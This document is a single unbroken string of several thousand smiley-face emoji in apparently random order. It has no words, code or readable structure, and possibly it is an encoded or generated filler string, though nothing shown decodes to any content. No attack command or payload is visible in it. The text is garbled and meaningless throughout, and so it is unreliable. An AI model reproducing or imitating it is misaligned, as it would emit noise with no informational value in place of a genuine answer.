😆😝😁🤣😄😜😃🙂😀😄😝🙃🤪😆🤪😊😇😆😝😝😉😂😊😜🙂🙂😂😁😅😉😅😄😇😇😁😅😄🤪😃😂😀😜😜🙂🤪😁😉😉😇😅🙃😇😉😂🙂🤪🙂🙂🙃😀🤣🙃😅😆😄😊😁😝🙂😝😄🤣😀🤪😜🙃😀😀😝🙃😇😆😉😊😉😁😂😝🙃🤣😂😜🤣🙃😂😃😆😉😁😅😄😇😃😂🙂🤪😃🤣🤪😜😝🙃🤪😃😊😉😉😅😉😇🙂🙂😁🤪🤣😂😅😀😆🙃😁😄😄😊😃😅🤪😇😜😂😜🤪😝😂🤪😀😊😉😇😄🙃😊🙂🤣🤣😝🤣😂🙂😜😅🙂😁😃😄😉😃😁😀😊😜🤣😊😝😝🙂😉😜😊😉🙃😃🙃😊😉😁😂😇🤣😂😁🤪😆😀🙃😀😁🙃😃😄😀😇😃😁🤪😇😝😂😊🤪😊😝😝😀😊🙃🙂😄😂😇🙂😆😅😝😆🙂😁😜😄🙂😄😃😀🙃😜😄🤪😇😜😆😇😝😊🙂😊😜🙃😝😁😃🙂😉🤣😁😅😇😆😅😁🤪😄🙂😜😀😀😊😀😃🤪😉😜😁😇😝😝😅😉🤪🙃🙃😂😀😂😃😁😄🤣😊😆😆😁😝😄🤣😃😜😀🙃😇😀🤪😊😊😄😇😝😉😆😉🤪😊🤣🙂😜😂😉😆😃😅😁😉😁😆😇😄😅😃😜😄🤣😜😜🤪😉😇😃😇😇😝😁😉😇🙃😅🙂😜🙃😂🤣😀😅😊😆😄😁🙂😄😆😃😝😀😅😜😀😀😂😝😀😇😊😇😄😉🙃🤪😆🙃😝😂🤣🤣😜😅🙂😆😃😁😇😀😁😃🤪😃😆😜🤪😀🤣😝😀🤪🙂😊😃😉😇🙂😁🙂😁🙂😅😂🤪😅😂😆😀😁🙃😄😄😃😇😝😁😜🤪😇😅😝😀😊😂😊😀😉🙃🙃😄🙂😝😅😆🤣😜😁🤣😆😜😁🙂😄😄😁😉😀😄😜😝😝😆😝😁🙃🤣😝😜😉🙂🙃😄😉😉😂😁🤣🤪😅😅😆😄😄😂😆😀😃🙃😀😁😃😉🤪😁😝🤪😝😅😊🙂😀😂😉😀🙂🙃😂😁🙂😊😅😆😆😜😅🤣😄😝😃🙂😀😀😜🙃🤪😁😜😊😇😆😊😜😝🤣🙃😆😇🙂😂😃🤣😉😅😆🤣😇😁😅😄😀😅😂😀😜😜🙂😜😃😝😉😇😁😊😇😉😅🙃😀🙃😂😂😄😉🙃😅😄🤣😊😁😆🙂😃😝🤣😀😃😃😂🤪😄😃🙃😇😄😇😊😉😆😊😝🙂🤣😂🙃😁🙂😅😃😆😉😁😆😄😇😃😅😀😝😜🤣🤪🙃😉🙂😇😃😊😉😉😅😂😇🙂😅😂🤪🤣😂😅😝😃🙃😁😆😃😊😃🤣😄😇😜🤣😀🤪😝😂😇😅😊🙃😉😆😂😊🙂🤣🤣😝🤣🤣😅😜😆🙂😅😁😆😉😃😆😜😊😜🤣😜😝😝🤣😇😜😊🙃😇😉😆😉🙂😅🤣😇🤣🙃😜🤪🤣😂😁😀😄🙃😁😆😄😉😜😅😝😇😝🤣😂🤪😊😂😉😀🙃😉😉😊🤣😊🤣🤣😆😝😆😉🤣😜😄🙂😃😃😀😊😃😄🤪😊😝🤣😝😝😊😀🙃😜🙃🙂🙂😃😂😉🤣😁😅😇😆😂😄🤪😄😂😝😀😀😊😀😃🤪😊😜😁😇😇😊😂😊🤪🙃😀🤪😀🙂🙃🤣😄😅😇🤣😆😁😝😄🙂😁😜😀🙂😁😃😀🙃😝😄😇😇😝😆😉😝🙃🙂😊😜😂😊🙂😃😂😉😆😁😁😝😆😅😃🤪😀🙃😁😜🤪😃😜😃😝😉😊😁😉😇🙃😅🙂🤪😂🙃😂😀😅😊🙂😄😁😊😆😆😃😝😀😅😜🤪🤪🙃😜😀😇🙃😊😄😉😊🙃😆🙂😝😝😊😄😜😅😉😂😃😁😊🙃😁😃😇😃😆😜😝😜🤣😝😜😇😄🙂😃😉😉🙃😁🙂🤪😆😅🤣🤪😅😂😆😀😁😁😝😄😃😇😜😁😜😜😃😅😝🤪😝😂😊😃😇🙃🙃😄🙂😝🙂😆🤣😂😆🤣😆😜😁🙂😄😃😃😉😀😄😜😝😝😆😝🤪🙂🤣😊😃😊🙂🙃😄😉😉😂😁🤣🤪🤣😅😆😂🙃😂😁😀😃🙃😀😁😃😉🤪😁😝🤪🤪😅😊🤪😇😂🙃😀🙂🙃😂😁🙂😊😅😆😆😜🤣🤣😄😆😂🙂😃😀😜🙃🤪😁😜😊😇😆😊😜🤪🤣🙃😆😁🙂🙂😃🤣😉😅😁😆😇😁😅😄😀😄😂😀😄😁🙂🤪😃😜😉😇😁😊😇😉😅🙃😀😉😂😂😀🤣🙃😅😄😆😊😁😆😆😜😁🤣😀😃😄😂🤪😃😉🙃😇😄😊😊😉😆🙃🙂😁🤣😂😃😅🙂😅😁😂😉😁😁😁😇😃🤣😄😝😜🤣🤪😃🤪🙂😇😊😉😉😉😁🙃😇🙂😅😂🤪🤣😂😅😄😁🙃😁😄🤪😊😃🤣😃😇😜😂😀🤪😝😂😇😄😇🙃😉😊😜😊🙃😆😂😝🤣😂😂😜😆🙂😁😁😆😉😃🙃😄😊😜😆🤪😝😝😂🤪😜😊🙂😉😁😇😉🙂😆😅😇😂😅😅🤪😆🙂😅😀😄🙃😃😆😆😉😜😃😝😇🤪😅😇🤪😊😂😉😀🙃🙃🙂😆🙂😊🤣🤣🙃😝😆🤣😅😜😄🙂😃😃😀🙃😜😅😀😊😝😆😇😝😊🤣😉😜🙃🙂😉😁🙃😉🤣😅🙂😇😆🤣🙂🤪😄😂😃😀😀🙂😜😇🙃😉😝😅😊😇😊😂😝🤪🙃😂🙃😀😂😉🙂😄😅😊😆🤣😆😝😄😀😀😜😀😂😜😀🤪🙃😝😄😇😊😊🤣🙃😝🙃😂😆😜😂😉😂😃😅😊🤣😁😁😇😄😂😄🤪😀😀😅😜😜🙂😝😃😇😊😝😁😉😇🙃😂😉🤪😂😇😆😀😅🙃😆😄😁😇😆😆😃😝😀🙂😄🤪🤪😉🤪😀🤪🙃😊😄😉😇😊😆🙂😝😂🙂😉😜😅😀😄😃😆😉😄😁😃😇😀😆😜😝🤪🙂🤪😜😇😉😜😃😉😉😊😁🙂😇😂😅🤣🤪😅🙃🤣😀😁🙃😄😄😃😊😀😁😜😝😀😂😜🤪😇🙃🤪😀😉🙃🙃😄🙂😊😂😆🤣😝😅😀😜😜😁😉😃😃😃😇😁😄😜😊😜😆😝🤪🤪🤣😊😜😉😉😉😃🙂😆🤣😁🤣😇😅😅😆🤪😁😂😄😀😃😉😜😃😜😊😉😁😝🤪😝😅😊😜😇😂🙃😀🙂😊🙂😄🤣😆😊😆😅😝😁🤣😄😀😁🙂😀😀😜😇😀😄😝😝😆😆😝😝😉🤣🙃😀😉🙂😂😃🤣😇🙂😁😆😂🙂😅😁🤪😃😂😀😃😃🙂🤪😃😝😝😀😁😊😆😂😅😉🤪🙂😂😂😀🤣🙃😅😄😆😝😆😆😄😜😅🤣😀😜😃😂🤪😀😝🙃😇😄😊😝😇😆🙃😝🙂🤣😂😜🤣🙂😅😃🤣😇😅😁😄🤪😆😅😀😜🙂🤣🤪😜😝🙂😇😃😊😅😅😁🙃🤪😂😅😂😀🙃😂😅😀😅🙃😁😁😆😊😃😆😀😜😀😅🤪🙂😇😂😇😀😊🙃😉😄🙃😊🙂😆😂😜😅🤣😅😀😀🙂😁😁😁😉😃😆😄😊😜😆🤪😜🤪🤣😇🙃😃🙂😊😃🙃😉🙂😆🙃😇🤣😅😅😀🤣😂😁🙂😉🙃😄😄😀😉😜😅😀😇😝😅😇😀🤪😂😉🙃😀🙃🙃😄😂😊🤣😅😂😝😆🤣😁😃🤣🙂😃🙂😊😉😀😄🤪😊😝😆😇😝😊🤣😉😃😉🙂🙂😁😊😉🤣😁😂😇😆😅😁🤪😄😂😃😄😄🙂😜😃🤪😉😝😁😇😇😊🤣😀😁😅😂🙂😄😉🙃🤣😁😃😊😆😆😆😝😄🤣😄😜😀😂😜😉😊🙃😝😄😇😊😊😅😝😝🙃🤣🙂😜😂🙂🤣😇😀😉😆😅😄😇😄😂😆🤪😀😂😀😜🤪🙃😜😃😇😉😊😅😊😇🙃😜😂🤪😂😂🤣😀😅🙃😆😄😁😊😄🤣😀😝😀🤣😊🤪🤪🙃🤪😀😇😉😝😄😉😊🙃🤣🙃😝😂😜😇😜🤣🙂😆😃😁😊😆😁😃😇😀😂😃😝🤪😊😄😜😇🙂😊😃😉😊😊😁🙂😇😂😂🙃🤪😅😜😂😀😆🙃😄😄😃😇😄😁😜😇🤪🙂😃🤪😇🙂🙂😀😉🙃🙃😄🙂😊😂😆🤣😝😅🙂😅😜😁😉🤣😃😃😉😄😄😜😊🤪😆😝😝😇🙂😝😜😉🙂🙃😃🙂😉😂😁🤣😇😂😂🤣🤪😁🙃😅😀😃😊😄😃😜😉🤪😁😝😇😇😀🤣🤪😉🙃🙂😀🙂😊😉😄🤣😊🤣😆😆🤪😅🤣😄😜😃😉😃😀😜😁😝😄😝😊😇😆😊😝😉🤣🙃😜🙂😉🤣😃🤣😊😃😁😆🤪😆😅😄😜😁😂😀😜😜😉😜😃😝😆😄😁😇😇😉😅🙃😜😉😂😂😀🤣😊😂😄😆😉🤣😆😁😝😃🤣😀😀😃😂🤪😀😝😊😜😄😊😁🙂😆🙃😝🙂🤣😂😀🙂🙂😅😃😆😇😂😁😄🤣🙃😅😀😝😜🤣🤪😜😝🙂😇😃😊😇😊😁🙃🤪😇😅😂🤪🙂😂😅😀😆🙃😁😄😄😝😁😆😀😇😜😅🤪🤪😝😂😇😃😃🤪🤣😄🙃😝😊😆😂😜😆🤣😅😜😅🙂😁😃😁😉😃😁😀😅😇😆🤪😝😝🤣😇😀😇🙂😉😃🙃😉🙂😁😂😆😝😅😅😀😁😂😁😄😅🙃😃😄😃😉😜😅😀😇😝😅😇😀😇😂😉😉🙃🙃🙃😄😂😊🤣😆😅😝😆🤣😁😃😃🙂😃😃😇🙃😜😆😜😊😝😅🤪😝😊🤣😉😃😉🙂🙂😉😝😉😂😁😅😇😆🤣😅🤪😄😂😃😄😄🙂😜😜😃😉😝😁😇😇😊🤣😇🤪🙃😂🙂😄😉🙃🤣😇😃😊😆😆😁😝😄😂😁😜😀😂😜😁😄🙃😝😝😃😊😇😆😉😝🙃🤣🙂😜😂🙂🤣😁🤣😉😆😅😂😇😄😅😁🤪😀😂😅😆😉🙂😝😁🤪😉😊😁😇😇🙃😅🙃🤪😂😂🙂😀😅🙃😆😇😀😊😄😆😃😝😀😂🙂🤪🤪😂😝😀😇🙃😊😇😂😊🙃😆🙂😝😂😂😀😜😅🙂😆😃😁😉😄😝😇😇😀🤣🤪😝🤪🙂😜😜😇🙂😇😃😉😊😊😁🙂😇😂😂😂🤪😅😃😁😀😁🙃😄😄😃😊😀😁😜😇🤪😂😇🤪😇🙂😂😀😉😊😉😄🙂😇🙃😆🤣😝😅🙂😅😜😁😃🙂😃😄😉😀😄😜😝😀😆😝😝😇🙂😝😜😉😀😅😃🙂😉😂😁🤣😝😂😅😆🤪😁🙃😅😀😃😂😄😃😜😉🤪😁😝😝🤪😅😊🤪😉🙃😝😀🙂😉😜😄🤣😊😅😆😆😝😁🤣😄😜😃😉😃😀😜😇😄😄😝😊🤪😆😊😝😉🤣🙃😜🙂😉🙃😃🤣😉😅😁😆😇😁😅😄🤪😂😊😇😜😜😊😃😃😝😝😀😁😊😇😊😅🙃🤪😉😂😂😀🤣😁😄😄😆😊😁😆😄🤪😄🤣😀🤪😜😂🤪😀😝😁🙃😄😊😊😉😆🙃😜😃🤣😂😜🤣🙂😅😃😆😆🤪😁😄🤪😀😅😀😀😄🤣🤪😜🤪🙂😇😄😝😉😉😁🙃🤪🙃😅😂🙂😅😂😅😀😆🙃😁😄😄😊😃😆😀🤪🤪😅🤪😜😉😂😇😄😇🙃😉😁😊😊🙂😆😂😜😂🤣😅🙂😉🙂😆😃😄😉😃😆😄😊😜😆🤪😜😜🤣😇😂😅🙂😉😃🙃😉🙂😆🙃😇🤣😅😅😀😂😂😁😂😆🙃😄😄😀😉😜😅😀😇😝😅😇😀😜😂😉😅🤣🙃🙂😄😂😊🤣😆😅😝😆🤣😁😃😁🙂😃😁😆🙃😜😁😀😊😝😆😇😝😊🤣😉😃😊🙂🙂😃😂😉🤣😁😅😇😆😅😅😀😆😂😃😄😁🙂😜😄🤣😉😝😁😇😇😊😅😉😜😀😂🙂😄🤣🙃🤣😆🙂😊😆😆😆😝😄😂😁😜😀😂😜😄😜🙃😝🤣😅😊😇😆😉😝🙃🤣🙂😜😂🙂🤣😁😆😉😆😆😀😇😄😂😄🤪😀🙂😃😜🤪🙂😝😁😝😉😊😝😀😇😉😅🙂🤪😂🙂🙂😀😅🙃😆😆😅😊😄😊🙃😝😃😅😜🤪🤪🙂😜😀😇🙃😊😆😝😊🙃😀🙂😝🙂🤣🤣😜😅🙃🤣😃😁😉😄😅😅😇😀🤣😂😝🤪🤣😝😜😇🙂😊😃😉😉🙃😅🙃😇😂😂😉🤪😅😂🤣😀😁🙃😄😄😃😊😀😅🤪😇🤪😂🤪🤪😇😂😇😀😉😉😊😄🙂😊😂🤣😂😝😅🤪😂😜😁🙂😄😃😃😉😀😝😇😊🤪🤣😇😝😇😂🙂😜😉😉😉😃🙂😊🙃😁🙂😇😅😂😅🤪😁😀🙂😀😄🙃😀😃😜😇😀😁😝😇😇😂😝🤪😉🙃🤪😀🙂🙃😂😄🤣😇😂😆😆😝😁🙂😅😜😃😃😂😀😜🙃🤪😄😝😇🤪😆😊😝😉🙂😝😜🙂😃😆😃🤣😉😅😁😆😇😁😅😄🤪😃🙃😃😜😜😊😄😃😝😉🤪😁😊😝😇😅🙃🤪🙂🙃🙃😀🤣😜😇😄😆😊😁😆😄🤪😁🤣😀🤪😜😉😃😀😝🤪😂😄😇😊😉😆🙃🤪😉🤣😂😜🤣😉🙃😃😆😀🙃😁😄😇😃😅😀🤪😅😊😉😜😝😊😃😃😊😇😝😁🙃😇🙃😅😂🤪😂😂😅😀😆😁😀😄😄😊😃😆😀🤪😆😅🤪🤪😝😂😇😀😊🙂😃😄🙃😝😂😆😂😜😊🤣😅😜😅🙂😁😄😆😉😃😁😀🤪😀😆🤪🤣😀🤣😇😜😊🙂😉😃🙃😉🙂😁😂🤪😅😅😅😜😃😂😁😄😁🙃😃😁😄😉😜😁🤪🤪🤪😅😇🙂😃😂😊😀🙃🙃🙂😁🙃😊🤣😆😅😜🤣🤣😁🙃😂🙂😃😃😀🙃😜😆😀😊😝😆😇😜🤪🤣😉😊😅🙂🙃😃😂😉🤣😆😂😇😆😅😁😀🤣😂😃😝😅🙂😜😃🤪😉😝😁😇😇😊😅😉😀😉😂🙂😄😊🙃🤣😄😂😊😆😅😅😝😄🤣😃😃😄😂😜😂😅🙃😝😄😇😊😊😅😇😝🙃🤣🙂😃😉🙂🤣🤣😀😉😅😁😁😇😄🤣😁😄🙂🤣😜😄😄🙂😝🤣🤣😉😊😁😉😇🙃😅🤪😁😁😂🤣😄😉🙃😆😁😆😊😄😆😄😝😀🤣😀🤪🤪😂😝😉🙃🙃😊😄😉😊🙃😅🤪😝😂🤣🤣😜😅🙂😆😀😀😉😄😅😀😇😀😂😆😝🤪🤣🤪😜😇🙃😝😃😉😉🙃😅🙃😇😂😉🙃🤪😅😂😆😀😁🙃😄😄😃😊😀😅🤪😇🤪🤣😉🤪😇🙃😇😀😉😉😊😄🙂😊😂🤣😂😝😅😜😉😜😆🙂😄😃😃😊😄😄😜😊🤪🤣😜😝😇😇😅😜😉🙂🙃😃🙂😊🙃😁🤣😇😅😂😂🤪😁😊😊😀😄🙃😀😃😜😇😀😁😝😇😇😂😜🤪😉😝😅😀🙂🙃😂😄🤣😊😅😆😆😝😁🙂😁😜😃😉😆😀😜😉😀😄😝😊😇😆😊😝😉🙂😊😜🙂🙃😃😃🤣😉😅😁😆😝😅😅😄🤪😃🙃😁😜😜😄😆😃🤪😉😇😁😊😝😇😅🙃🤪🙂🙃😊😀🤣🤪😜😄😅😊😁😆😄🤪😁🤣😀🤪😜😉😁😀😝😜🙂😄😇😊😉😆🙃🤪😉🤣😂😜🤣😉😊😃😆😁😇😁😁😇😃😅😀😝😜🤣🤪😜😝😉😜😃😊😝😀😁🙃😇😉😅😂😜🙂😂😅😀😆😊😂😄😄😆😂😆😃😇😜😅🤪😜😜😂😇😀😊😊😜😄🙃😃😉😆🙃😝🤣🤣😅😀🤣🙂😁😃😄😇😂😁😀😅😁😆🤪😝😝🤣😇😀😝🙂😉😃🙃😇😜😁😂🤣😊😅🤣🤪😆😂😁😀😄🙃😃😄😀😝😁😁🤪😜😆😅😇🤪😝😂😉😃😊🙃🙂😄😂😝😊😆😅🤣😉🤣😆😜😄🙂😃😄😄🙃😜😄🤪🤪😁😆😇😆😆🤣😊😜🙃🙂🙂😄🙃😉🤣😁😅🤪😊😅😁😜😇😂😃😀😀🙂😜😁😀😉😝😁😇😜😁😅😉🤪😃😂🙂😀😂🙃🤣😄😅😊😆😆😁😜😂🤣😃😃🙂😂😜😃😀🙃😝😁🤪😊😊😆😉😜😜🤣🙂🙂😝🙂😂😃😅😉😆😆😅😇😄😅😃😀😂🤣😜😂😅🙂🤪😃😇😉😊😆😇😇🙃😅🙂😀😜😂🤣😜🙃🙃😆😄😁😊😄😅😁😝😀😅😜😃😂😂😝🙃🙂🙃😊😄😉😊🙃😆🙂😝😂🤣🤣😃😊🙂😆😁😇😉😄😁😁😇😀🤣😃😝🤪🤣😝😄😁🙂😊😊😀😉😉😁🙂😇😂🤣🙂🤪😅😂😆😄😊🙃😄😇😄😊😃😁😜😇🤪🤣😜🤪😇😂😊😁😁🙃🙃🤪😅😊🙂😆🤣😝😅😂🤣😜😁🙂😄😁😊😉😀😊😇😊😜😆😝😝😇🤣😊😜😉🙂🙃😁😜😉😂🤣😀😇😅😅🤣🤪😁🙂😆😀😃🙃😀😆😂😉🤪😝😁😇😝😅😊🤪😉🙂😊😀🙂🙃😂😆😜😊😅😆😝😝😆🤣😄😜😃🙃😄😀😜🙃🤪😅😂😊😇😝😁😝😉🤣🙃😜🙂🙃🙃😃🤣😉😅😅😜😇😁😅😄🤪😄😂😀😜😜🙂🤪😃😝😉😇🤣😁😇😉🙂😆🤪🙂😂🙃😀🤣😉😂😄😆😊😁🤣😊😝😃😜🤣😜😀😂🤪😀😝😉🤪😄😊😊😉😂😁😝🙂🙂😅😜🤣🙂😅😃😆😊😅😁😄😇😃😂😊😝😜😜😁😜🤪🙂😇😃😊😊😇😁🙃😇🙂🙂😁🤪🤣😀😄😀😆🙃😁😄😄😊😃😆😀😇😜🙂😂🤪😝😉🙂😀😊🙃😇😄🙃😇😉😆😂😝🤣🙂😜😜😆😃🙃😃😁😉😃😁😀😝😃😆🤪😝😝🙃😂😜😊🤪😄😃😉😉🙂😁😂😝🙂😅😅🤪😆🙃😜😀😄😝😉😄😀😉😜😁🤪😝😜😅😇🤪😊😉😂😀🙃😜😝😄🙂😊🤣😆😅😝😆🤣😁😜😄😉😊😃😀😇😇😄🤪😊😜😆😇🤪😝🤣😉😜🙃😊😁😃😂😁😇😁🤣😇😆😅😁😜😆😂😃😀😀😊😊😃🤪😂🙃😁😝😇😊😅😉😜😊😂🙂😀😂😇😁😄😅😃🤪😆😁😝😄🤣😃😀😄😂😜😀🤪😇😊😄😇😉😂😆😊😝🙃🤣🙂😜😂🙂🤣😃😅😇😜😁😁😜😀😅😃🤪😄🤣😜😃😀🙂😝😃😇😝😂😁😉😅😜😅🙃🤪😂😂🤣😃😂🙃😆😄😁😝😜😆😃🤪😄🤣😃🤪🤪😂😝😃🤪🙃😊😄😉🤪😂😆🙂😀😝🤣🤣😜😅🙂😆😄😅😉😄😁😃🤪😜😆😜🙃😀🤣😝😜😇🙂😊😃😉😉🙃😁🙂😜😁😅🤣😃😆😂😆😀😅🙃😄😄😃😊😀😁😜😜😀😅😝😃🙂😂😊😀😊🙃🙃😄🤪😀😁😆🤣😜🙂🤣😆😀🤪🙂😄😃😄😉😀😁😀😊🤪😆😝😂🙃🤣😊😜😉🙂🙃😄😜😉😂😁🤣😇😅😅😆🤪😉😂😄😄😀🙃😀😆😄😉🤪😁🤪😇😇🤣😝🤪😉😂🙃😄🙃🙃😂😅😜😊🤣😆😆😝😁🤣😄😜😃🙂😀😄🤪🙃🤪😁😉😊😇🤣😇😝😉😂😊😜🙂🙂😂😁😂😉😅😇😉😇😆😅😄🤪😃🙂😄😜😜🙂🤪😁😜😉😇🤣🤪😇😉😅🙃🤪🙂🙂🙃😀🤣🙃😅😆😂😊😁😇😇😝😄🤣😀🤪😜🙃😀😀😝🙃😇😆😜😊😉🤪🤪😝🙃🤣😂😜🤣🙂😅😃😆😉😁😅😁😇😃😂😆😝😜😂😀😜😝🙂😇😃😊😉😉😅🙂😇🙂😂🙂🤪🤣😂🤣😀😆😉😅😄😄😊😃🤣😃😇😜😜😝🤪😝😂😇😀😊🙃😉😝🤣😊🙂🤣🤣😝🤣😂😄😜😆😉😆😃😄😊😁🙃😂😊😜🤣😜😝😝😀😄😜😇🙂😉😃🙃😊😉😁😂😇🤣😂😂🤪😆😝😇😀😆🙃😃😄😀😇😃😁🤪😇😝😂😜🤪😊😅🙂😀😉🙃🙂😄😂😇🙂😆😅😝😆🙂😂😜😄🙃🤣😃😃🙃😜😄🤪😊😝😆😇😝😊🙂😊😜🙃😉😇😃😂😉🙂😁😅😇😆😅😁🤪😄🙃😁😀😀🙂😜😃🤪😉😝😁😇😝😃😉🤣🤪🙃🙃😊😀😂😉🤪😄😅😊😅😆😁😝😁🤣😃😜😀😃😇😀🤪🙃😝😄😇😇😇😆😉😝🙃🤣🙂😜😂🙂😝😃😅😇😁😁😁🤪😅😅😃🤪😃🤣😜😃😀🙂😝😃😇😇😇😁😉😀😄😅🙃🤪😂😂🤣😀😅🙃😆😄😁😝😃😆😃😝😝😅😜😀😜😂😝😃🤪🙃😊😄😉😝😉😆🙂🤣😝🤣😂😜😅🙂😆😄😅😉😄😁😃🤪😄😆😜😝😜🤣🤪😜😇🙂😊😄😇😉🙃😁🙂🤪😉😅🤣😆😁😂😆😀😁🙃😄😁😁😊😀😁😜😜😄😅😝😁😄😂😇😀😉🙃🙃😄🙂😊😂😆🤣😜🤣🤣😆😃😂🙂😄😃😁😉😀😄😜😊🤪😆😝😜😊🤣😊😃😊🙂🙃😃🙃😉😂😆🙂😇😅😅😆😀😆😂😄😉😀🙃😀😃😜😉🤪😁😝😂🙃😅😊😀🙃😂🙃😃😅🙃😂😆😂😊😅😅🤣😁😉🤣😄😃😄🙂😀😉😅🙃😜😄😝😊😇😅😝😝😉🤣🙃😃😉🙂😂😅😊😉😂😁😆😇😁🤣😆🤪😃😂😀😄😄🙂🤪😆😃😉😝😁😊😇😉🤣😊🤪🙂😂😂😄😉🙃😅😅😂😊😅😆😄😝😃🤣😀🤪😜😂🤪😄🤪🙃😇😆😜😊😉😆😊😝🙂🤣😂😜🤣🙂😅😁🤣😉😁😁😄😇😃😅😀😝😜😂😆😆🙃🙂😇😁🤪😉😉😆🙂😇🙂😅🙂🤪🤣😂😂😀😆🙃😁😊😜😊😃😆😀😇😜😂😀🤪😝😂😇😀😊🙃😉😇🤣😊🙂😆😂😝🤣😂😅😜😆🙂😁😃😄😉😃😝😊😊😜🤣😝😝😝🙂😜😜😊🙂😊😃🙃😊😉😁😂😇🤣😂🤣🤪😆😃😄😀😄🙃😃😄😀😉😜😁🤪😇😝😂😊🤪😊🙂😂😀🙃😊🙃😄😂😇🙂😆😅😝😆🙂😆😜😄😃😂😃😃🙃😜😄🤪😇😜😆😇😝😊🙂😇😜🙃🙃😝😃😂😉🤣😁😅😝🤣😅😁🤪😄🙃😆😀😀😊😀😃😜😉😝😁😇😝😝😅😉🤪🙃🙃😇😀😂😄😁😄😅😊😆😆😁😝😄🤣😃😜😀😉😀😀🤪😇😃😄😇😊😝😆😉😝🙃🤣🙂😜😂😉🙂😃😅😉😆😁😁😇😄😅😃🤪🤣😊😊😜🤪😊😀😃😇😊🤪😁😉😇😉😅🙂🤪🙂😂🤣😀😅😁😃😄😁😊😄😆😃🤪😀😅😜🤪🤪😂😝😀😇😆🤣😄😉😝🙂😆🙂😜😉🤣🤣😜🤣🙂😆😄😅😉😄😁😃🤪😃😆😜😂😝🤣😝😜😇🙂😊😃😉😉🙃😁🙂🤪🤣😅🤣😜😄😂😆😄😆🙃😄😁😁😊😀😁😜🤪😜😅😝🙂😄😂😇😀😉🙃🙃😁😉😊😂😆🤣😜😂🤣😆😂😆🙂😄😃😃😉😀😆😃😊🤪😆😝😜😜🤣😊🤣😄🙂😊😃🙂😉😂😆🙂😇😅😅😆😀😂😂😄😁😁🙃😃😃😜😉🤪😁😝😇😇😅😊😀😊😂🙃😄😇🙃😂😄🙂😊😅😆😆😝😁🤣😄😃😁🙂😀😀😜🙃🤪😄😝😊😇😆😝😜😇🤣🙃😃😊🙂😂😁😊😉😅😁😆😇😁😅😄🙂😇😂😀😃🤪🙂🤪😆😀😉😇😁😇😇😉🤣😊🤪🙂😂😂😄😂🙃😅😇😁😊😁😆😄😝😃🤣😀🤪😜😂🤪😄😇🙃😇😁🙂😊😉🤣😉😝🙂😂🙃😜🤣🙂😅😁😅😉😁😇🙂😇😄😅😀😝😜🙂😀😜😝🙂😇😁😝😉😉🙂😁😇🙃😅😂🤪🤣🙂😂😀😆🙃😁😆😅😊😃😜😃😇😜😅🤪🤪😝🙂🤪😀😊🙃😉😆😝😊🙂😜😜😝😂🤣😅😜😆🙂😁😃😄😉😃😅😃😊😜😂😄😝😝🤣🤪😜😊🙂😉😃🙃😉🙂😅🙃😇🤣😅😅🤪😆😂😁😀😄🙃😁😆😄😉😜🤣😃😇😝😅😜🤪😊😂😉😀🙃🙃🙂😄🤪😊🤣🤣😆😝😆🙂🤣😜😄🙂😄😃😀😊😃😄🤪😊😝🤣😝😝😊😉😁😜😉🙂🙂😃😂😉🤣😁😅😇😆😂😄🤪😄😂🤪😀😀😊😀😃🤪😊😜😁😇😇😊😂😊🤪🙃😀🤪😀🙂🙃🤣😄😅😇🤣😆😁😝😄🙂😁😜😀😆😆😀🤪🙃😝😄😇😇😝😆😉😝🙃🙂😊😜😂🤪😃😃😅😉😆😁😁😝😆😅😃🤪😀🙃😁😜🤪😀🙂😃😝😉😊😁😉😇🙃😅🙂🤪😂🙃😂😀😅😊🙂😄😁😊😆😆😃😝😀😅😜🤪🤪🙃😇😀😇😊😇😄😉😊😉😆🙂🤪🙃🤣🤣😜😅😉😅😃😁😆😃😁😃😇😀😆😜😝🤪😃😉😜😇😉😉😃😉😊🤣😁🙂🤪🙂😅🤣😜😂😝😊😀😁😊😁😄😃😆🤣😆😀😇🤪😅😝😜🤪😂😊😀😉😊😊😄🙂😄😊😆😂😝😅🤣😆😀😅🙂😄😃😃😇😁😄😜😉😜😆😝😝😇🤣😊😀😇🙂🙃😃🙂😇😊😁🤣😜😀😅😅🤪😁😂😄😀😃🙃😀😃😜😇😜😁😝😜😀😅😊🤪😇😂🙃😀🙂🙃😂😄🤣😝😂😆😆😝😁🤣😄😜😃🙂😀😃😃😇😀😄😝😝😜😆😊😜😉🤣🙃😜🙂🙂😂😃🤣😅😀😁😆🤪😄😅😄😀😆😂😀😀😀🙂🤪😄😜😉😇😁😊🤪😊😅🙃🙂🙂😂🙂😀🤣🙃😅😄😆😊😁😆😄😜😀🤣😀😜😇😂🤪😄🤪🙃😇😁😝😊😉😆🙃😜🙃🤣😂🙂😇🙂🤣😃😆😉😁😆😆😇😃😅😀😀😃🤣🤪😇😇🙂😇😃😊😉😉😆😊😇🙂😅😂😀🙃😂😅😉😜🙃😆😄😄😊😃😅😄😇😜😅🤪😃😃😂😇😀😊🙃😇😄🙃😊🙂😆😂😝🤣🤣😅😃😅🙂😁😁🤣😉😃😁😄😊😜😆🤪😝😝🤣😇😃😝🙂😉😃😉😉🙂😁😂😇🤣😅😊😁😀😂😁😄😅🙃😃😁😜😉😜😁😜😇😝😅🤪🤪😊😂😉😉🤣🙃🙂😄😂😊🤣😅😝😝😆🤣😁😜😄🙂😃😉😝🙃😜😄🤪😊😝😅🤣😝😊🤣😉😜🙃🙂🙂😇😄😉🤣😅😆😇😆😂🤣🤪😄😂😄😀😀😉😃😃🤪😉😝😅😝😇😊😜🙃🤪🙃😂🙂😀😂🙃🤣😄😅😊😆🤣😄😝😄🤣🤪😜😀😉😀😀🤪😉😜😄😇😊😊🤣😊😝🙃😜🤪😜🙂🙂🤣😃😅😊🤣😁😁😇😄😂😁🤪😀😊😇😀😀🙂😝😃😇😊😝😁😉😇🙃😂😊🤪😂😜🤣😀😅🙃😆😄😁😇😆😆😃😝😀🙂😁🤪🤪😅😄😀😝🙃😊😄😉😊🙃😆🙂😝😂🙂😂😜😅😉🙂😃😁😉😆😁😃😇😀😆😜😝🤪🙂😜😜😇🙂😊😃😉😉🙃😁🙂😇😝😉😄🤪😅🙃😂😀😁😉😆😄😃😊😃😁😜😝😀😅😝🤪😇😃🙂😀😉🙃🙃😄🙂😇😃😆🤣😝😅🤣😆😜😁😃😜😃😃😉😀😄😜😝🤣😆😝😝😇🤣😊😜😉😂😀😃🙂😇🤣😁🤣🤪🙂😅😆🤪😆😂😄😃😁🙃😀😃😜😇😜😁😝😆😜😅😊🤪😉😂🙃😀🙂🙃😂😄🤣😝😆😆😆🤪😃🤣😄😃😄🙂😀😄😃🙃🤪😄😝😝😝😆😊😂😀🤣😉😜🙂🙂😂😄🙂😉😅😁😆🤪😅